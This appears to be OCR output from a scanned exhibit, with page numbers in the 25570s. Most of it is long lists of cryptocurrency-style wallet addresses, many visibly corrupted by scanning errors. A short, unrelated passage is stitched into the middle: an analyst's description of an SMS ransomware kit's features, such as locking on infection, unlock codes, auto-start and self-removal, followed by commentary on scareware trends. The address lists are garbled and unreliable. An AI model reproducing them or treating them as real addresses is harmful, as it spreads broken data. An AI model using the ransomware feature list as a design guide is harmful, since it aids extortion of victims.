LFNtbSZHV9Td2Tk4Di55VWivb1U3KB/7LTy 
1FnuBvgWV5S4yReE5fEAdWT8vUTo4dBKxB 
1FnUvda926XsQC2dxy8AaJvz7VMb2EJrCx 
1FNwPPt8E7Uc48vF 60xbHoBomMPsaGoNAc 
LFNxnAwbS2RQ4ckZhySwZ9z4kgkc8tPGqF 
1FnyajNNC2E6tZEbdXV3PgoLRS6j7myBo9 
LFNZ53J6suuYjchdvbFJMeqTh7XybpZFfx 
1LFoS5MU4CLnXnEhSSPgbP4J7B9ZDsa7NDuU 
1Fo8138YQqCTLHF2W6VEvdyUgsqUuaK17Uf 
1LFoDQ6X9rnj3Syosm2rnSNt35MBrarqG35 
LFoFHFMCvbgexcyrHYEGxgLXaPhNEBF4W7 
1LFoFHn1pjXapvpoDwMmB9K7HqLqxDgzm1z 
1FoF]Xe4chaF 3xemot4R98fgbfBvzxXv2uy 
1FohKsopUVop3w8sci8Rkx1lncnvKuFixwy 
1FoiCnnuBHVv4iwpZSTqB65bZrfDY XbWiW 
1FoLvcqnaxiVoDn8EqcVUbbSE6N1kdhxWwf 
1LFomF7gPpjvmhySGWNuG33zAPq2sBCymLu 
1FosxW1gpMé6dkrLaD4Lpnn7ZxYE9MHh55N 
1LFoVbRyQUG30P4cUfzoUB6zZVUVun5otAR 
LFoWC81kL7N22CX26YChHyY6SWTtrv7EEB 
1FowtnA8bf7HTtfDLIY9BNbjkKTWFZWYXnc 
1FoYgh97B4L4hdTL6kh1MYUGNYSpV5FzA4 
LFoYU2W7hKcPYxCgzVZcgFwJFuLPAN6ChK 
1FoyYBKtMRVLeyaEpf2F89jnkrMMVrRKvd 
1LFoZAkJJ8AnNQCKgr1APpd2hF7p1qx2qswG 
1Fp2xV6RrGPuMuJRtdDagxWibgohphrris 
1LFP71cjwaLmCAd2ZVUERLVq6eDx18Eqm8o 
1LFp7UNZNZWx7d1BMYVa2zDprvfFVxpYY2P 
1FpahjcBNCu2fxdKFptjENSSE7M1FD6m91 
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1LFpCFbuW2LaQY4ZzzhdGkJWuhMYNxDS3W9 
1FpcZYqjwKBpUugCkxpQCguwSorDtXqhdE 
1LFpFK3kgTf3EspqPzV7kwK583aMoL5Cuww 
1Fpg89LmrdWvCtkTZF4eTccCdoCrSqniGh 
1FPgD1kkqe6Bx59NbWvWdczZRu7u4mbA8M 
1LFPGPPP2x2pqoXK16srjFrAr4JRU9Z3sPe 
1FpKPDUv9tmtYZesEQE8scpboKSVUnNUio 
1FPLD9CBGt7eEvNSt8P839Xsa2KfGmFdLr 
LFPMJhLghEh3SrzzQGWX62nWYXYeJhMZjt 
1LFpnnbNyRYULICQUWTBnpb2r9ke834EjLZ 
1LFPO6TVHbYH1IrSZEXQWtQhuWumspIrhLvc 
1FpP3HzD417YEWt7n670Bk9RWxg4pjJEgAS 
1FpP3XgPRvKzZg75znuRXvPkQagd7SZEHm 
1LFPPZYTHenDuozTU5KH14jyNeFvoNgyBkz 
1Fprj335bR14EiAzY6mbzs8sj6f4ocm3qS 
1FpuaUce55V44vUqmVNSm5faBAPTjMnQY] 
1Fpwa33xjYEqmTAL626sVQiiSMBajtjZRB 
1FpwqB5eR3v1lrNvBHhG25uneZVe4CBNqp6 
LFPYGd3VSBxTbNdNe8mmKNz3EGa2G80B2u 
1fpYNCzkX1jnmkDXVidvLH3iEs]qgS1w7B 
1LFq24F89LC4E5E4GPJfHhj5SPJMNSn5tNC 
1LFQ2TvcRTjwDOwEXnKSy4p9YMvbPcBuuzGz 
1LFQ3qYVeYsvnsQhGbMtg5vR348FUQQ9ItZA 
1LFq5R8m2XqfQT/7BT7DfkAfVb82CdYA8KEB 
1FQ6s8LBfBfdbYrCncWkSH2viUJzdu6n81 
LFQ7m2N5h8hLaTHEyU5mu7RKLj95xQ7F3s 
LFqg97nq2Nq1zVk8jSbjLUU5Mqc6RQjsfak 
LFQAtBKUnNMWE86SpuAcyxU6tuKYgL2ukK8i 
1LFgAV392ypdYFBceAlAgicnkRUZsNE7oVc 
LFQAyDYZLI9aTP5py Tanu4GQFZ4DLotkxQ 
LFqbHPwZiuHWCkwtyeu7MnZ9RMNMrWFHms 
LFqc3NY7ogNpsCue43xfz3jKdRAWVQ28pA 
1FqDV8Z3D5NVQgXCnA34HNxcsq7Uvv71h3 
LFQEM1YTvxtjpc3KtEzkZuY8pqbLAp4Nfm 
1LFqEXEMhoJ6AtCnr80deyLv9KM6jqNU6N2 
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LFQgXv1PTmzV9k2QCBc22Y3i55uhnKUH2P 
1FqhdcedeCVdow72F5Xm7N9xSd5vsMDgjh 
1Fqi95ZNaZFeyZmMHbBrFT32vjXZ6M5DUyH 
LFqjv8pF7mXs47Ui4veQsjU2tUxNPNeB86 
LFQKd8UfCksp1CxhkVGPe4K2v3BpatHrx7 
LFQMBvmv8VH46222pw1X8MdDttoJB3YBf5 
LFQMrhDbPxNfnDcRCU98G5ho2ovpairV6R 
LFqPrLZjJYcCNsNhfHf2fiodabwjT1loYJwk 
LFQsv2UktVMDyDwjvFRm1XPcRFS3UDyt2m 
LFqWHEuLrSHWetcSZaMRXjFWYwK2EPVBe] 
LFRIA4xiW4YWg8uv7iTYZmWuRLn2sVFehb 
LFR4xaXxijf5Y] gUJ6QUjEcC52hsukn7K4CZ 
1Fr837TnNKSGM5TJ)w7Mb7LqSMbhbE5Eh9RB 
1FraPEDKWjhtdZJNTc1r9HDFyQN8A2cHDQ 
1Frb6RGwcfgkKVZUms9qK7dTSaxHe3PCPrc 
LFRDJam9RYgn8W6zdQK3Ge7zrWwmf4vvsB 
1FreUUgkixVyN3JcPu6uUUUMm7fn8EJCJGPj 
1FReUZHTCtKDGSbYohrPD8c9y3Vdjs41QP 
1FrG9rJnWmACNbycGWFjoNe9Ae9tLnBXeE 
LFRKMEuvoC5JkamJcXEXMLODZXA9XGP2Vs 
1LFrnY6gkzLSHvLpKFBvf5ENmso62hT2AF}J 
1LFrQKDfgAhLPCZgdzz4eTv3FdMPxWNDS4S 
LFRqquqSkAtVwTkKH8qGCWMy2TkFYoqxzme 
LFrrliHYCef8M7qpbKf3T9sUgGmGtvy2Vb 
LFRR5FXxhVyYuTGrQ529qFcLV51g4kFW8b 
1FRI3azeWfkAFsMovvUv56GNSAJ3GoqtNU 
LFRTdhcUieg7p9jXnRDXJo2JBCHkvZCedH 
1FRWaiNH3g48i8TdDAXhUR9NPdMQDYm7wQ 
LFRWhSQUsmYfmyT2uh4XnwjJxnu7nDkm6na 
LFRWQDGQshDJ6XEW7mr74xXCdvsVAwmet2m 
1LFrXgGTtlHbnkbjpMdsi8E8NB28qQxPgh7 
1LFRZWpgYLXzrpmuY9aSszgK2u6A6bSAi50 
1Fs1T2RESrAT44zovp473H5F8NpMCXdwct 
1FS7hARLJZwpPFDyojYgjWZbqrPxHMnbB) 
1FS7okhCLTtL3DwXYfAwGWwaibZ5kjLb8F 
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1LFS8bVDVnBv7rWPRghSuj9JZuCLYEx8iPu 
1FS9iISh52iMc1Bbwm7dGWy1tjHJs1bGVuu 
1FsaboB3WcjxXDpzfWReovHPTMjp68DQDEq 
1LFScPW6LZH3M6fhaf13ZaB5d8Mjv2QFsy7 
LFSCYP3hB3FfzgtHh1TzCtyCY9uUNZ9SAT 
1FSE4p89S87M9cwbéduTnABvjaeLy8LaNR 
1LFsgWyV6s7J8vu6vRsSjpZDcC7uuquwBRm 
1FShwjjwzT4GQ8eFIGZDUWRx8bsqZENxYd 
1FskmtXTsgfcbDopvRyj4hxiBzZMbx6YScW 
1FsMfnrEwwaNVBQp8z6KdaRBV9DtVQxcNR 
LFSMq4NRHhuC9yKvo045q8VSBdFUQEhRWZ7 
1FSPGFHQHRtz9ad3uCeSrTjzhreFKoQoNq 
1Fsr5towj2jiAGgjQWBeSmSYQMMASUfZv1 
1LFSRsCnvCjpNKraGmVpH 7eP4)xk39WidJX 
1FSubDU5pfJaPMZgxikT Iscspr5yjXPLX6 
1LFSVaN4EhYDmM7BV9JSfntJrNUUP3VfxXcm 
LFsvkMmCryBL7F5q1F2p2pGf80ZJfMzKbf 
1LFSVMJuf4f5YRxi7NsKgMu2V1cQcb1zBxk 
LFsVpWW7ZK8dmwZ2fycRBQbz7xh5dBLoSt 
1LFSW17gB7f5xNihizTpQn8EDkWdQL9mtqG 
1LFSWjjBcAGqmAYZUEKeyWmb2AUsfnjJnKNc 
1FSwUrSCsk9H1UHz5ri2VmRw5SioLPBfQC 
1Ft21Ed4mx8ADmVghnMPV22V3iUkKDVxYj9 
1FT27vscpCDv5T5RabHJ8gPyD3khHY]J8wk 
LFT5Y2vMAvfypCNWZ9zVcE9jzqriibYrFY 
1FTafrSbTKrwHAGPreEgojMmPSu2741vr 
LFtAxZhAbrzDdDkki59MyJruJKSHyDQTLa 
1FtcmW1m6VJeWgFUp7Q5gWLmpxXyBvcHcUQ 
1Ftcz75cyrBcitaxdz3vWNzxFP8U6VQHi5 
LFTGFKVYrXCp7Jkoqb4wEz5fcczEfuCteN 
1LFtF1f5adstlxLxBWAmLCGESZSy]7vwfz6 
LFtfD5ZHEREVSycThEaoiehmMVYuU4L4kj 
LFTH52nkmRXG6qchr5SSKPbnbMféLmd8Yh 
LFTIFWUoALECV3N23M1HUR1i2DNdg9Gyen 
LFTiVqvXknypeGLLPeSiy6tWkjive67GeW 
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1FtojoKSABYXzgyM4hG8EmoEsxiJbcPN3s 
1LFtPdWHpgqrjuuDgpHdzkT luaSW6zXwPbW 
LFTQ2b2gYRhoJ5Kc1VMQWTEsGxo8d1kN27 
LFtqMU8k3]7gQ5XiSoFUhxVpERGZxoNEss 
LFtQqoSVvHhRyhJvxrmAjtlL3HTXF5yMG3F 
1LFTRnbChwpCcwcBwKEnkhUqM8kK3hAvx8gn 
LFTRV5QNqo4qZYsbQFPNiV81D6NazMNCAr 
LFTSDfgXD8CuztWmz])7vd6HRsAbtdWgz8 
1LFtTaV9FWgLEBexkiSsAh9nDEP67Ltddtz 
LFttFZVGTF8jhVHyTXe9JSNQDPsLyg3cVU 
1LFtVNo9s2gpc1Zg1lnvDWL5J31mFgFPo4SY 
LFtvWJBKKPjLGVDDZwwjmxXjWmWfhKwog9w 
1Ftym5ejMHmqZcG5YZjjeg291Hmu74HgRB 
LFTyn1p6fWnSnfMDMy6286EUZcPPEi29Y 
1FtyzaQ8gUQGKcZW3ro04Lp3BKyzgjxoQWq 
LFtZTIWCTWi8DTodaq)XyQqoZ6Tk9aR2B7 
1Fu2SApdkeFah2vm8AU2th5a4BGw4mxjhr 
1FU4RWr8UnQcDrB3wXwBKfpTLsNQ2P8ehe 
1Fu4ZtjsiwoWWkrzFKeLcLZMCoWb7h8ixf 
1LFU6x1rXBdH3fP1Jk3VeVZ4gpNuwS4ohijj 
LFU92DYkc3xVyWzy5zZEVnKQF4NDTdgq8p 
1FU9QReusvgtbvV2V5h2XXMNn9CwxL6Gfd 
1FubzbU5m8TaqGxgm]XjegxlEEvvpkroYv 
LFUCiyEC3KQWAFh1ANcJDPy1dqEfLMsu5k 
1Fucte6YkmsFgv/7ePi9B71yECNAWS12bjh 
LFUdvCDjqKvRZhB64LiTLzvxxaNtgDsn2E 
1LFuEvVCLgdCA5HT5A4zqPiYK6fdawuE346Q 
LFUEymv9FFsWJvYvFu3nMGa3pWnKZzTMC6 
1FUhdmrXATS8twRMO6frHNzokRpKF1GNuNP 
1FuhRaqjJbRnphZgvMekZsyPqDXpPp31ZMiW 
LFUIHCCHA8XfvuwFiWUvxYtrdimvmvFMJ2 
1FujtxxbXgkAagLTaBsJDMo260Y1bE2ebE 
LFUjWmjcKabwYyXec5NRg4TYir5pcDzh5A 
LFUKHd3moVYTMFYpHggERJYp7HrzccMPPa 
LFULtThcJJA89jZUgMRnNUSV6TPVZUVRsL 
25570 


1FULUBAuFek357Sj7q1N6PKcTZpcTGESQL 
1LFUM1cDFQM4ZceDknejU8ucXLgTnsmaHSV 
1FUMg8zehYYsSHDvssHmBDaLAAM1xoWXNrP 
1LFUNg2KA9ANdNK9vMiasWSa36SjDuQySeu 
1fUngAQiTjeD2G4F394XnQn4n3eGaU9gA 
1FUnSCorWRbBbSk3ipxMGHd9NuhgG8rpsL 
1FuqU)xPcS8xjxTRmw/7ps5fQ3jpbdxREyT 
1Fur8vWz3NmqanbfXzotB1HQnhjE6hXHiU 
1FuRFbbt6uf7q7Gw4MgpE2gREHfpUvxXwym 
1FUrgleU25YrhE4iZ3XPDMpnNz6GAZHWPH 
1Fus2eH9GQ6cenaxXN4gGqmS2ipdGq3kByE 
1FuSaQCKCP9FzvT loUXzJVfkBHvksTtmP5 
1FuswSKQUqRG8pDRY6RQ6Di7ZWnAWraRct 
1FuTVc8G2FSMZ1uetXmLon69G12MVHFFWk 
1FuuNnz7HGRWLboULfyGUdA5h9jchSyyax 
LFUxMp9Sd21jAjLonoKH5FpHQkokb8WoVY 
LFUY2GdrMH2VQv8KV7NRP2t8qPXCZgWKBs 
1FuYe24zpw3tZCqZhieJJUyZQgnEmarymD 
1LFv1fkK1JsacJ1fVCHfoU3fJDyMHxNhCmjL 
LFV23iXQ3qz5sJ2BEF5vQktZyTAQ4W3zvj 
LFV2W3zpNb5Esbbh77yeNfcmNi3ERxQPvW 
1Fv7tCuSAanzteTMdngaMN46Ve8k4AKUQW 
1Fvb6CnP5R39wiDoBAKkCKSGwxkNvKBMvL 
1Fvdq3vB7DDPCMYif6905f8CPeWTeeE3AT 
1LFvEjTyURojvaeLhTNFNuddhwLl12xSkmuW 
1LFvFp9iMiBVD4jwod63APGCCb7zrzWr4BV 
1FVisHeh7nk6jbDhCt]JaG4BXFvC9KtQs4i 
LFVJn9NapWuWMam99W24e6M8f81g9FuBy8 
1FvkaVoV6Hq6G1zKd2tqwhlEFw2QPHv1lqw 
1LFvkUbaff5221s4iAY1mR6LgymUW1RNuLc 
LFvLTd4Efo4sacBF9vfpEXUjWvCU9DJrH1 
1FVNe4Hd4055Z2ZDb6Bn7zgw3UCYAbL6vv 
LFVNvJAEJiXZoiVxaZisSmgyWhajHBt6aA 
LFVpCAyvGWh83ADm]vp4vtubk9peZenhpj 
1LFvSWGbooLefQyWMHr9TtC8ACgNjdTErle 
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1LFVwznj47pEv1kfZN74AYFoTB4WkFUh4uw 
LFvXTFy2ybeEh1YMwW4Wd2DSrxJvoQTY2j 
LFVxxqr7ftVZAJhe5GCRRd4BpzgzMFT5F2 
LFVYYdrPFMsciZ384daqk1KD33CSq2MTb9 
1LFvZtZVMgysnXGZsYsnUGDG6u3RW8q2ZCP 
1Fw31aZBi9QpDphN4iCeu2xdhe64id7yjx 
LFW3FJRCK3gdzXkpmuz2PWZGxge4hsegqjS 
LFw4KPYK6TNEU3xZhAUB9Wwg5LBT vvd2nxXw 
1LFW9xGDLs7QrkR7fWCCZFIJFM98v2WL61eg 
LFWCyof]WbC2cAkrkAehhfx5UdMexKEAg2 
1FwDqyCUhBgXkdQgLGCAvgGjDmo048VQ2t5 
LFwGLgBQ8YpjgH6Vu0TjYyV7bFCpVCTZS2 
LFWH2LyBB9FdkKgtshVM4bybmNrJmCLum 
LFWj9JpQZXWLmhPrwiVilJsKhHREihy4p4 
1FwkbiclZ4v6gxGPkMZbtGhSWdKBA4k3Kz 
LFwLjvlyK804xb4WbFtjgpa9ej4GHx3NcH 
LFWMMeLcSEowNZQgqihvtNUA3QnMXTWdjkA 
LFwMsM62CupyWo4VbCZDAwfgaqFfnrL9KSz 
LFWNyCgLoHE4JoezTWQAS43DTvwovxbAmY 
1FwoYeEDXPUahhPYXo0p42Kj2ri8GWzSksK 
LFwQhGPR9zwjnjGHLoLZNghiklqzw54Cx 
LFwQLaJwk3fsY3vUMry4EhjaHhwwpcRAMa 
LFWrTcWiPPjUdK2rgKhLqr93rzdo8reMGb 
1FwSKajzwxgLIsz4NoLGomnRsjT5RVZB94 
1LFWutkxqi8FqoH3upQR6S2GaAutRJM3vVS 
LFwV9dc87PMWBiG5EVgwR2HGCa/7Krdc4Hq 
1FWvyxPqqyeLvCJTGcg4yoPTzZGWcxXinryX 
LFWW3Ae7BVnMbiYZprgrq4Bszr2AQXEr4h 
LFwXGMtLrrmy1m5WvsxyYtyMF8G3PRmkK1d 
LFWXnd4wMu8joNlynxLM8eViFxNSFBP2)J4 
LFWzrjSQak35u4u9Axhwd8SvrQxfAmwSiv 
1Fx1lbsst4SQK2znnTiaDqhLmrRxXroACgju 
1FX2a96d9EZBm7qqgjta8xn9wxcSCeFgB5 
1Fx55jbeWevcqkGHsg5gpalLVvcDvsKDdmM 
1LFx6SRVIOK63YjdEYT47KViz4kHSBrVMZF 
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- Ability to use multiple-unlock codes 

- Ability to use multiple SMS numbers from where the activation code will be obtained 

- Ability to lock the system immediately upon infection, or after a given period of tim 

- Auto-starting features, self-removal upon entering the correct activation code, and ensuring 


that the victim would no longer be infected with this release through the use of mutex-es. 
- This SMS ransomware is Windows 7 compatible 
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Beegute no NYYeCHHbIA BAM KNOY B STO None 


The majority of SMS based ransomware is relying on the "Unlicensed Windows Copy" theme, 
but the first self-replicating through removable media propagation such ransomware is 
signaling a trend to come - social engineering throuhg impersonation in a typical scareware 


style. This release can be easily described as the first scareware with micro-payment ransom 
element offered for sale. 
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1FX7brliwF56tKdGBQYvxNrZms69qyPZBW 
1Fx8Z9WauxhDKxfb30DqjFlqsdb3gmvgVS 
1FXaaj9Ru543Z8hhZxrhToNrDuM6ie9yVB 
1FXAevqm1luTVjZYSMP1H4qsUsM6jkXmr6S 
1FXAKm9a4QQcRH5BUreKgvs8FYpjwUoQRD1 
1FxBVPa8fEbqGsMzKDnakjvnTnADtgbwY8 
1Fxe7uq22bgdhbcBQriffVuHmYC1y]PnAg 
LFxf43v21mYM9ykrigyFgNSjm1FCrUqVEi 
1LFxFOZJNidqygoH1n62QqzFEmvEtUPcjaS 
1FXhadvVnsG4ohprxWLc66RRC2rPzLohzi 
LFxhMbkMNX5gRATinDjMzVa4oKjiygssVA 
LFXjJExYfwrevdn2ebud7gqzGoAnsER2j1W 
1LFXjvVvr4mSTjr2hTaydRgQth7tPZ4hhto 
1FXkbafn6jROMJ4CT|]WS3NMKGBhceqYykKr 
1fXKWHRdbdPFkhaidLE2yfpsuuk93NWbj 
1LFxp34ctEM7ZGkxYUgg22NcdLbvtvbJJYh 
1FxQcADZT3e5781prGfpjj8YfokPcfRXW8 
LFxQWkwygQYCubW5zRt8X2wqLXejv8ePnd 
1FxR30nY6rG81X9t7h9Xan2dD3QQamA6F5 
1FXshpEJTDC4MiAh4scuYMqr3ParG3DMox 
1FxSQ1g2TbT6PKKMXPNoA2FPPA1SmiDuqF 
1LFxXUUjptNH19GRgzCHUyKxYDLhfHjkF3Be 
1FXuyMgajuYWJHYNgY43bhMFjw8vprBUTD 
1FxWgFjtPylnTkp9RAVBXPwMTseAiLENwP 
1FXwicCdznBhKvmZEdqFQCQywBZ3XPSZfX 
1LFxwmRHddBxt3AK8tqV6QUDMslo9mBIwrx 
1FXXdiBdkEARGUo1HBTiaW3Cfg3mBDCh9t 
1LFxyMjXon3u0oxfQm3BXBcSCcgc8CES5t5Ri 
1FXzrHelMug3xCpSC27214YQjsMBNyjxmo 
1LFy2QYR7LM800ZL73AAz08aGMo2vwxgqiC 
LFY66j3gqC)2JraYwuuPWGdAERRAexWztf 
1fY6kYt6BIZ0QKeUjJAWTN12kbVHSJMFGL 
LFYACs52ungwS251pN9c2NsfuNbpgYejwz 
1FybKFDrGSK5EgLp5aCPySkvufxWkz5T9E 
1FYccveruwg8HvTXPxyzZWFs/7ryR9XxSLkx 


25573 


1FYeRahYjk1hLeWfN5jzkto1l 7WH2QH6E99 
LFyh3tZXPXg7N729y9AULT29ri2jnLntnD 
1LFyhGGga7M1vikZmj56fg2bdxvAvxzfsZU 
1FyKiczkbjFAP3GZ7qJdcdzhJAserFdCQe 
1LFyNVS597DeA5SNVph4F9P3dHyeKKNKxKN 
1LFynx3tNFzaCKHSP1vLkKgxQm4KWJKCP4K 
LFYojxubCWWr34KHr87JHvCSUwWKwSgV4gF 
LFYqW5BGUeA8RUKjBrbPysRGHhyxQS6GxW 
LFYSLIkpMT8VxjdM3rYGPpmVn8swhxZxq4q 
1FyTEr7LLKAPRJyLUMSHyasmFBS7WquEAZ 
LFYTSwFmqkhScBU5Co8VCAJdHPLubocCWe 
LFYtw7V61XxhGhefWaBcgsZD2dG1PgDfyU 
LFyW6hH7fgazCW5SpGSuwfSmaP1znx1indx 
1FywrsG9R4h899FCLsYoP6x5pQfAxa8Vtc 
LFYXw8wmWJRLtAhnp4TFbjxj88DAjUZ5al1 
1LFYYLRDAkhsmb5KD6Y8RJdQtgQ5c8LobBm 
LFyymG8exTJ2zhgKkf5CNGjkqSg5NyRWzx 
1Fz20nKZ1HhRaEAJ7GMGmnGewbED2rA6hP 
1FZ39PQs5aPKyFGSok2515EyXhkBRnEpAw 
1FZ8mMbMC19M4Hf7fmiZARWKshFt7W6zYW1 
1FzZ9a8Xm7N32yqXQTsGrQrdymvQUUNI1EJa 
1FZD99h5ydmLyCngLyGccCVExhxoMxJ5We 
1FZDK6PPskekfFkJYdywqFNMnp9ck9yYXo 
1FZG32JNKW56JGoAVEzZYkKSVJKQHcTB1T1Y 
1FZJB94hb87 yAfPQB6i2j36ECx6FH36csc 
LFZJWt2j6vfRSvJgCFVvjtmiJGiqkxC8sY 
1LFzkKdTTMZQLMazzhn7o0Lz8hBUCFJkZh1x 
1FZMA7NFy9iEEgazSyBNsotB7td3ebstp6 
LFZNEXo0i85QpwNVhANkwUGx5qK2jYrPBeY8 
1Fzqa4adJ1rKNeUM2gtZzu9YfATcvyAZtu 
1FzqRs12Sackze8Yw2iCzvUJNWb2JjyN9x 
1LFZSUbKC7sJjiFfLedZdYFFm7Ejy83LdLyc 
1FZSwMKHWaG8J]szM8GPDu6ATLHSgypp7FP 
1fztixBND8e2wkifQfgRpAXcSV3ji6UfH 
1FZU9ngKwVxgGdquueoMiCjLNFRHarfUTM 
25574 


1FZUpcbPJTVFeGytmefEKyUuJqgAqUDtqnv 
1FZvPe6BVwjtAZnEjcipuT lpThw9KuL2Y 
1FzvXgTYpwr7jlySg5GPXbFD8qHYQv9euA 
LFZWT 7atRJt6aPdaqfjSCrERFfZjxXdjuf5Kk 
1FzZ2FUMQyCwrsYb6CmrPyEulmSazmmyYRa 
1FZZehqd1gN3fuxvdMFtgxMqESSiIGNcwlu 
1FzzJdbE1C3faGkwdWnyCjZjc4qFv7Rzws 
1G11pKtaYqy7RXS7MLmKBJHdSgLtZMrGw9 
1G136MeodqYGwuFGtnpv1lmSbFfPWvzV4A1 
1G16iBtVoDpCVFsSsQXAwsCRJJAL2hJV5i 
1G1aELbiCRVQC6G61KwMiHCKuXpawg5Ajm 
1G1byGvc3sfvQyeP8wof9PCKTPAMnurSAN 
1G1BYtGInNx5hUhYLsJAEMfUCDjNBqMoxo 
1Glea8pRiY986NXvSKLtHYsmDkQqvr2moc 
1GlecBPQ5Zgf9Hbhsirh5sy9qcs5ZXCN5S 
1G1ECVJfDLfyyfLbAatc2pZv2ABVPEUmpb 
1G1fTLZvynM9W9bzZRVEMgrwTZyBbg1PZ77 
1G1JLegZ3WL6iYMUARF1WMFUyK4kt61R9x 
1G1L1rqpga3BAuXhRBSKxF6éNEMZSQBRLar 
1LGINHg5RF5hJ2AwTCrdiqJAiZ7Q|JBZAXpV 
1G1nvSdx9v4MoWhXdHufmkNjJcyCMEUHINL 
1G1Pi9p3T1QRCVMQvy5fLb1d1rBvXRtpzf 
1G1Puio9PB845Aix19VaTBC4dNWdtH1m2m 
1G1sH9JBiyyKw2u7DgBDcuiPcShHaZCYkD 
1G1tFBjNdmuP2nxfVKHXTJ98tiHOohP1SVa 
1G1X16gGwLfFe6U7AMnc5Vv4UjFszBvfAx 
1G28KsVoZY]vWtgqjw16RopizwKVrSvphyb 
1G29RNaLZXVpoosMvajFDjrxdmD1oWc4vY 
1G2DA4hZtPqDekU5LMfxdTYk9XwMxmoGs5 
1G2FMBHUKiJEqnhxazHNTCDi4YnfFkJx8H 
1G2hv6KFg35Dj2yY5qiWthcQ5Eqp956BsL 
1G2L3jpVTLxEZvNUFKWs67ZSNM9kDwaA3} 
1G20x9cNb8tVD5L74FULx5GYH5u5ybwdxP 
1G2RFZKpFu4h69idQrMe5FJdk8HifPhUK1 


1G2TCNLHRGR2QGQYNnsMXm8XZFq4GbSgDe 
25575 


1G2UPRZDoxBd9bhRGpVjJMsGyn6H2nnbra 
1G2vVSq9xLkN3xBPcsEfaewAmr49enGmdE 
1G2YZWMM4nB63iGESaH2dRVZYWsZbvWxkN 
1G2zRVPegfy5HUHLASKCSZKd3CHMmAN8uFG 
1G34g9Ap9imudSh506Z62ct4WkSc7hx7yf 
1G34Lf8n7SEMvcxMggW3zf3v47EtTLu4ll 
1G34Zhwy5ARsex4A6RxSbqQ8SdVBBxdM9t 
1G35diebPgVxCvtpA1PFsSp7mCbXzSsMEt 
1G38dzbBx1bnYjShakq82UX90B3VeULAKN 
1G3AQ68XrKvAtoj8Nt9hoveWTQT7HUHxFg 
1G3CXD8kvbfD8nCjgM6WvZUB5txyQEvZkKr 
1G3dTJbM44UR8DGpftN 1qeohvhAVcbG2W 
1G3Dvy8JLD1xF9mz3sXYu37MZHZpApM5P7 
1G3huzckvX8GxXKncFb4nFmjs|db5BfxZv 
1G3jabXqZroXhly6kcgBBb5dqVC3FCdiLx 
1G3KKq8AkfvgzbMSUaBhMW2zWxawcMhKX3 
1G3ky2w3cGjRFmrJ4T8ilbk8GoztvsPcSi 
1G3qPzT7jezARU704dktKRHFMDRAapaRG1 
1G3rNCWejbsWdA7pVW3bZMiU5ywpBaHyV4 
1G427iSnLDXafxkVau94qMqqkFKRBHXsap 
1G43Y1Z9TJaJ2neBJgA9Ly6fMLZcXTMUP9 
1G45sRmoeLnCFLwkZ6Ck5bN4s8BZUC86KW 
1G485vZjT4lob2DP054Ks3rBRYqc4aiEy6 
1G4E6fieRQdzjcwPvrMjqSoD50pUZ8mP2c 
1G4f21lepvi8MUG8jvR8etAtsCu3HIG5JUR 
1G4FxDNTGxZ9Q1Y5v2mjxx9cSnzRJj6Hfd 
1G4HVN9OUBUBfe5o0Bkgd3hfj46yyHDghrpN 
1G4JfxMQjKAWZf8pPXey5o0cSL5UcYpqePM 
1G4Jo1CNU8yirpBKjQLQFeaavaeykspMVf 
1G4Nkpt9cb7vh7fJVEpWYbhgRrHri4p2My 
1G4NSVagqwXV7HLez7h8umXFQeZQq1G5xj 
1lg4ouZwnmvxXNwotCwztjs9YjB1CvUgV9k 
1G4qSgTk6EF 7iKHVEaULPknpqkel8m9WWT 
1G4RswPAgQM4jHzjfTo76y6Hzkmj6fmJJK 
1g4rzPjCJSXuNvCspD18HzfViD7YCYc4u 
25576 


1G4Y1zinoqQHRLTWVTKdQFJ4EYchBxMxq1 
1G56VNHnVbdMM1loGzdidzhMaHeVUH7WEpj 
1G5BGd8M8qBJks8hCLzm6vPZJbMPyTL7VW 
1G5cVTFK3e5xxo7MNRrTiPQhu82QLGNyv5 
1G5dPLvkDe8p4wq3d4DJRZB5vaC5BqySwM 
1G5e23N5rc8wW2myUpxU4A2rnFkFCpbFFU 
1G5Kk8SfbrjKPfcMjzPo6eMX5jjwanH2pj 
1G5M556erFry5CcoekE9Dc6boKcQ7fRpBR 
1G5pDN4Wxh7isxmW]PtwSY2QmrMewW22Zr 
1G5rZy51MSA5YRbyHdnT9xvUovbc8gZTYW 
1G5sf2yiKURHTRG7SauRyjGtAXrRZDbLF 
1G5tmK3fQ4yTWEEK8kMj55edTCeH1srbK2 
1G5VXuv5hKZoNa7Wxb9GsKCQyhN3YVT6jw 
1G62hNcCY2t8EFin3yXkBbJwmEATRwviGt 
1G66gwLKsdaECw3CDQBwF PuZq4K2FeJQwT 
1G6dCyGRPhbHPk6QRWKedd7Tp1uSwLSHXs 
1G6iEDPHAaxMo582 7tEUCuNgoCghjJ94mF 
1G6J4yta20B3RjcHT9tSszdsCsE2vulAKj 
1G6Lp8y2komjiGUGAYxkj2AC8Mhe976Ypb 
1G6Q5H1TqnC2hoFu5TbYyJypg4T86QUVVQ 
1G6rasNeAkKfSciwpR8qs5wajYh9ajJfBhu 
1G6tQeWrwp6TULgqunLjdNmLTPQu7PnsMYd 
1LG6UEnPtNdpYD5frtXbz6tcdi58Fn8ZM1K 
1G6w1VpLCUDvMu2FzZU5kkgxTAgr2yQM8dV 
1G732yiA9EPD8GXyR7HyYgKHwVfAjsHzCr 
1G74crRTxK392Zz75X3cRWPYNewASUMmMDBQ6 
1G78aJr3UJSJCa9Kvo6UgR256MMZ2BC2xe 
1G7atdsZtsfhzK7BxMdFTEt6QXkTX7mwnq 
1G7cjJCHP7JD4YjmMzeKFs9v2PhdBb4uee 
1G7Eyw6oWHtNRFHFCUgCyYbBiMbyJX7dyrx 
1G7fTH4E1Lbrom30jU4JjUvKintWY8hezri 
1G7M9YJNMY4YyTZ9H 7NSMGQBqTnPbBivpwz 
1G7Q8DenDDU6WoyLGeRDTPévKYXehqajy2 
1G7QfZ5qpx2ZrYWGd1nXacmbKYnz6w1xFM 
1G7RisSMaaoHd9pghGKRVbuJ3Zrm9Zd126 


25577 


1G7SBFypALuf2cr19hF1p73jfkAwrtz1Da 
1G7sxgCdekuQN1J6nz63wvV66FGFdFNVE7 
1G7TGorkjjrXqWnj9cEQesU7YtYcND3taN 
1G7VpJjKC7GnNTmjNNkq3kXWK6iXNHHEr3f 
1G7Wm3k8Uy6vTRNjEDvyeoe7miRpegg47P 
1G83cC32bsj7EoqiIcW7w5gyZGVdztqAD75 
1G8BGsZXTDNtKV5ycSuEJLb3kKUAUU9HPkG 
1G8eYdEcsm3yzYtMqfYDyXNgE6Bd5p8QPb 
